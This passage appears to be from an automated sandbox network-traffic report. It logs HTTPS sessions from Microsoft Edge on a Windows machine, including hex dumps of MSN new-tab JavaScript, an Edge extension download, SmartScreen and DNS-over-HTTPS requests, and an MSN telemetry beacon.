                                                                                                                                                                                                                                                                                    Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                    Akamai-Server-IP: 23.195.36.239
                                                                                                                                                                                                                                                                                    Akamai-Request-ID: 2a2e7b9d
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                    Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Akamai-GRN: 0.ef24c317.1732223592.2a2e7b9d
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC15145INData Raw: 30 30 30 30 36 30 30 30 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 6f 2c 61 2c 69 2c 72 3d 7b 32 33 38 36 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 53 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 71 7d 7d 29 3b 76 61 72 20 6f 3d 6e 28 33 33 39 34 30 29 2c 61 3d 6e 28 36 35 31 37 35 29 2c 69 3d 6e 28 36 33 30 37 30 29 2c 72 3d 6e 28 33 39 30 30 31 29 2c 73 3d 6e 28 32 32 33 39 30 29 2c 64 3d 6e 28 34 34 38 38 36 29 2c 63 3d 6e 28 34 30 39 32 34 29 3b 76 61 72 20 6c 3d 6e 28 32 38 39 30 34 29 2c 70 3d 6e 28 39 39 34 35 32 29 2c 6d 3d 6e 28 34 32 35 39 30 29 2c 67 3d 6e 28 39 34 35 33 37 29 2c 75 3d 6e 28 38 35 32 30 35 29 2c 68 3d 6e 28 34 37 34
                                                                                                                                                                                                                                                                                    Data Ascii: 00006000!function(){var e,t,n,o,a,i,r={23865:function(e,t,n){"use strict";n.d(t,{S:function(){return q}});var o=n(33940),a=n(65175),i=n(63070),r=n(39001),s=n(22390),d=n(44886),c=n(40924);var l=n(28904),p=n(99452),m=n(42590),g=n(94537),u=n(85205),h=n(474
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC9443INData Raw: 68 69 73 2e 66 69 72 73 74 4b 65 79 50 72 65 73 73 4c 6f 67 3d 21 31 2c 74 68 69 73 2e 62 69 6e 67 55 70 73 65 6c 6c 46 6f 63 75 73 65 64 3d 21 31 2c 74 68 69 73 2e 74 72 65 6e 64 69 6e 67 53 65 61 72 63 68 65 73 52 65 71 75 65 73 74 65 64 3d 21 31 2c 74 68 69 73 2e 6f 6e 41 75 74 6f 73 75 67 67 65 73 74 52 65 6e 64 65 72 65 64 3d 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 65 2e 74 61 72 67 65 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 53 75 67 67 4d 6f 64 65 22 29 3b 74 68 69 73 2e 69 73 4e 65 78 74 57 6f 72 64 41 53 4d 6f 64 65 3d 22 31 22 3d 3d 3d 74 7d 2c 74 68 69 73 2e 6f 6e 41 75 74 6f 73 75 67 67 65 73 74 53 68 6f 77 6e 3d 28 29 3d 3e 7b 74 68 69 73 2e 61 75 74 6f 73 75 67 67 65 73 74 53 68 6f 77 6e 3d 21 30 2c 28 30 2c 72 2e 47 67 29 28 72 2e 74 6b
                                                                                                                                                                                                                                                                                    Data Ascii: his.firstKeyPressLog=!1,this.bingUpsellFocused=!1,this.trendingSearchesRequested=!1,this.onAutosuggestRendered=e=>{const t=e.target.getAttribute("SuggMode");this.isNextWordASMode="1"===t},this.onAutosuggestShown=()=>{this.autosuggestShown=!0,(0,r.Gg)(r.tk
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 75 64 69 65 6e 63 65 4d 6f 64 65 3b 21 30 3d 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 57 65 62 41 50 49 53 75 67 67 65 74 69 6f 6e 26 26 21 6e 26 26 21 74 68 69 73 2e 69 73 4d 6f 62 69 6c 65 28 29 26 26 21 74 68 69 73 2e 69 73 54 61 62 6c 65 74 28 29 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 4d 53 4e 53 75 67 67 65 73 74 69 6f 6e 73 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 4d 53 4e 53 75 67 67 65 73 74 69 6f 6e 73 3e 30 3f 31 3d 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 4d 53 4e 53 75 67 67 65 73 74 69 6f 6e 73 3f 74 68 69 73 2e 70 6c 61 63 65 68 6f 6c 64 65 72 3d 74 68 69 73 2e 70 6c 61 63 65 68 6f 6c 64 65 72 7c 7c 74 68 69 73 2e 6f 70 74
                                                                                                                                                                                                                                                                                    Data Ascii: 00006000udienceMode;!0===this.options.enableWebAPISuggetion&&!n&&!this.isMobile()&&!this.isTablet()&&this.options.enableMSNSuggestions&&this.options.enableMSNSuggestions>0?1===this.options.enableMSNSuggestions?this.placeholder=this.placeholder||this.opt
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC8204INData Raw: 73 76 67 60 2c 56 3d 60 24 7b 28 30 2c 73 2e 59 71 29 28 29 2e 53 74 61 74 69 63 73 55 72 6c 7d 2f 70 72 2d 34 39 39 39 31 34 31 2f 69 63 6f 6e 73 2f 73 65 61 72 63 68 2d 62 6f 78 2d 69 63 6f 6e 73 2f 73 65 61 72 63 68 5f 67 2e 73 76 67 60 2c 71 3d 60 24 7b 28 30 2c 73 2e 59 71 29 28 29 2e 53 74 61 74 69 63 73 55 72 6c 7d 2f 70 72 2d 35 31 35 36 31 39 33 2f 69 63 6f 6e 73 2f 73 65 61 72 63 68 2d 62 6f 78 2d 69 63 6f 6e 73 2f 73 65 61 72 63 68 5f 69 63 6f 6e 73 5f 6c 69 67 68 74 2e 70 6e 67 60 2c 4b 3d 60 24 7b 28 30 2c 73 2e 59 71 29 28 29 2e 53 74 61 74 69 63 73 55 72 6c 7d 2f 70 72 2d 35 31 35 36 31 39 33 2f 69 63 6f 6e 73 2f 73 65 61 72 63 68 2d 62 6f 78 2d 69 63 6f 6e 73 2f 73 65 61 72 63 68 5f 69 63 6f 6e 73 5f 64 61 72 6b 2e 70 6e 67 60 2c 4a 3d 44
                                                                                                                                                                                                                                                                                    Data Ascii: svg`,V=`${(0,s.Yq)().StaticsUrl}/pr-4999141/icons/search-box-icons/search_g.svg`,q=`${(0,s.Yq)().StaticsUrl}/pr-5156193/icons/search-box-icons/search_icons_light.png`,K=`${(0,s.Yq)().StaticsUrl}/pr-5156193/icons/search-box-icons/search_icons_dark.png`,J=D
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 24 7b 24 2e 43 7d 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 70 78 3b 74 6f 70 3a 31 32 70 78 3b 62 6f 74 74 6f 6d 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 35 36 70 78 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 31 36 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 62 6c 69 6e 6b 20 31 2e 33 73 20 73 74 65 70 2d 65 6e 64 20 69 6e 66 69 6e 69 74 65 7d 2e 73 65 61 72 63 68 2d 62 74 6e 2d 6f 6e 2d 72 69 67 68 74 2e 66 61 6b 65 2d 63 75 72 73 6f 72 7b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 31 36 70 78 7d 2e 73 65 61 72 63 68 2d 69 63 6f 6e 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65
                                                                                                                                                                                                                                                                                    Data Ascii: 00004000${$.C};position:absolute;width:1px;top:12px;bottom:12px;margin-inline-start:56px;margin-inline-end:16px;animation:blink 1.3s step-end infinite}.search-btn-on-right.fake-cursor{margin-inline-start:16px}.search-icon{display:flex;justify-content:ce
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC12INData Raw: 22 24 7b 65 3d 3e 65 2e 6f 6e 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: "${e=>e.on
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC4135INData Raw: 30 30 30 30 31 30 31 42 0d 0a 53 75 62 6d 69 74 28 29 7d 22 20 64 61 74 61 2d 74 3d 22 24 7b 65 3d 3e 65 2e 62 75 74 74 6f 6e 54 65 6c 65 6d 65 74 72 79 54 61 67 7d 22 20 64 61 74 61 2d 63 75 73 74 6f 6d 68 61 6e 64 6c 65 64 3d 22 74 72 75 65 22 20 69 63 6f 6e 2d 6f 6e 6c 79 3e 24 7b 59 65 7d 3c 2f 66 6c 75 65 6e 74 2d 62 75 74 74 6f 6e 3e 60 2c 58 65 3d 79 65 2e 64 79 60 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 70 73 62 2d 77 72 70 20 24 7b 65 3d 3e 65 2e 61 75 74 6f 73 75 67 67 65 73 74 53 68 6f 77 6e 7c 7c 65 2e 73 68 6f 77 41 50 49 41 75 74 6f 53 75 67 67 65 73 74 42 6f 78 3f 22 61 75 74 6f 73 75 67 67 65 73 74 53 68 6f 77 6e 22 3a 22 22 7d 22 3e 3c 66 6c 75 65 6e 74 2d 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 64 65 65 70 2d 73 65 61 72 63 68 2d 62 74
                                                                                                                                                                                                                                                                                    Data Ascii: 0000101BSubmit()}" data-t="${e=>e.buttonTelemetryTag}" data-customhandled="true" icon-only>${Ye}</fluent-button>`,Xe=ye.dy`<div class="dpsb-wrp ${e=>e.autosuggestShown||e.showAPIAutoSuggestBox?"autosuggestShown":""}"><fluent-button class="deep-search-bt
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 61 74 65 73 46 6f 63 75 73 3a 21 30 7d 7d 29 7d 2c 34 37 35 30 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 71 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 7d 29 3b 76 61 72 20 6f 3d 6e 28 33 33 39 34 30 29 2c 61 3d 6e 28 32 38 39 30 34 29 2c 69 3d 6e 28 34 32 35 39 30 29 2c 72 3d 6e 28 36 37 34 32 32 29 3b 63 6c 61 73 73 20 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 3d 65 7d 67 65 74 20 57 65 62 55 72 6c 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 77 65
                                                                                                                                                                                                                                                                                    Data Ascii: 00004000atesFocus:!0}})},47507:function(e,t,n){"use strict";n.d(t,{q:function(){return T}});var o=n(33940),a=n(28904),i=n(42590),r=n(67422);class s{constructor(e){this.response=e}get WebUrl(){var e;return null===(e=this.response)||void 0===e?void 0:e.we
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC12INData Raw: 66 69 6c 74 65 72 28 28 65 3d 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: filter((e=
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 3e 22 22 21 3d 3d 65 29 29 3b 74 68 69 73 2e 6c 61 79 6f 75 74 53 74 79 6c 65 3d 69 2e 69 60 24 7b 6e 2e 6c 65 6e 67 74 68 3e 30 3f 60 3a 68 6f 73 74 20 7b 24 7b 6e 2e 6a 6f 69 6e 28 22 3b 22 29 7d 7d 60 3a 22 22 7d 60 7d 7d 28 30 2c 6f 2e 67 6e 29 28 5b 72 2e 4c 4f 5d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6c 61 79 6f 75 74 43 6f 6e 66 69 67 22 2c 76 6f 69 64 20 30 29 2c 28 30 2c 6f 2e 67 6e 29 28 5b 72 2e 4c 4f 5d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6c 61 79 6f 75 74 53 74 79 6c 65 22 2c 76 6f 69 64 20 30 29 7d 2c 35 39 35 36 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 51 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 7d 29 3b 76
                                                                                                                                                                                                                                                                                    Data Ascii: 00006000>""!==e));this.layoutStyle=i.i`${n.length>0?`:host {${n.join(";")}}`:""}`}}(0,o.gn)([r.LO],c.prototype,"layoutConfig",void 0),(0,o.gn)([r.LO],c.prototype,"layoutStyle",void 0)},59561:function(e,t,n){"use strict";n.d(t,{Q:function(){return s}});v


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    13192.168.2.550025152.195.19.974434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC622OUTGET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732828390&P2=404&P3=2&P4=AWOCGn%2f5q6RNxVS7%2fjhSYDCixRz%2bmQY0jaYBCPiSYbzX2yFPRgPPwARFz4cZHf%2fElpV3Q%2fz95o15ZDniXBTs1g%3d%3d HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    MS-CV: X9nsUlIue40Lh2xDAXDu2p
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:13 UTC633INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Age: 12150123
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=17280000
                                                                                                                                                                                                                                                                                    Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:12 GMT
                                                                                                                                                                                                                                                                                    Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT
                                                                                                                                                                                                                                                                                    MS-CorrelationId: b4b4aabf-4d02-4629-96b1-a382405b6a31
                                                                                                                                                                                                                                                                                    MS-CV: 642I+iNy0Qp5KFcIV/sUKh.0
                                                                                                                                                                                                                                                                                    MS-RequestId: 5245ac9e-0afd-43ce-8780-5c7d0bedf1d4
                                                                                                                                                                                                                                                                                    Server: ECAcc (nyd/D11E)
                                                                                                                                                                                                                                                                                    X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                    X-AspNetMvc-Version: 5.3
                                                                                                                                                                                                                                                                                    X-Cache: HIT
                                                                                                                                                                                                                                                                                    X-CCC: US
                                                                                                                                                                                                                                                                                    X-CID: 11
                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                    X-Powered-By: ARR/3.0
                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                    Content-Length: 11185
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:13 UTC11185INData Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20
                                                                                                                                                                                                                                                                                    Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    14192.168.2.55003113.91.222.614434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:13 UTC723OUTPOST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 746
                                                                                                                                                                                                                                                                                    Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                                                                                    Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiMkxNMFZ3SGZtL1FoSERMTXF4TGhQdz09IiwgImhhc2giOiJGRHN6TmwxYjkwQT0ifQ==
                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                    If-None-Match: "636976985063396749.rel.v2"
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:13 UTC746OUTData Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b
                                                                                                                                                                                                                                                                                    Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:14 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:14 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                    Content-Length: 57
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Server: Kestrel
                                                                                                                                                                                                                                                                                    ETag: "638343870221005468"
                                                                                                                                                                                                                                                                                    Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:14 UTC57INData Raw: 39 00 00 00 0a 00 00 00 6d 75 72 6d 75 72 33 00 0d 00 00 00 e7 00 00 00 0c 00 00 00 2c 4d f0 68 e4 05 e3 5a 14 87 bb 38 10 5c e2 c4 94 3c 26 4c 69 f1 48 99 f4 5b b2 3f 6d
                                                                                                                                                                                                                                                                                    Data Ascii: 9murmur3,MhZ8\<&LiH[?m


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    15192.168.2.550157162.159.61.3443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:14:53 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-11-21 21:14:53 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-11-21 21:14:54 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:54 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8e63b128da884269-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-21 21:14:54 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 03 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcomPC)


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    16192.168.2.550161162.159.61.3443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:14:54 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-11-21 21:14:54 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    17192.168.2.55019520.110.205.119443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:15:09 UTC1245OUTGET /c.gif?rnd=1732223700869&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=4a15e35cafd94d159c0b19139d533c19&activityId=4a15e35cafd94d159c0b19139d533c19&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=13B8460915C043F29EE15DCA68DCD589&MUID=00AA082B214465520B5C1D15206D642A HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: c.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
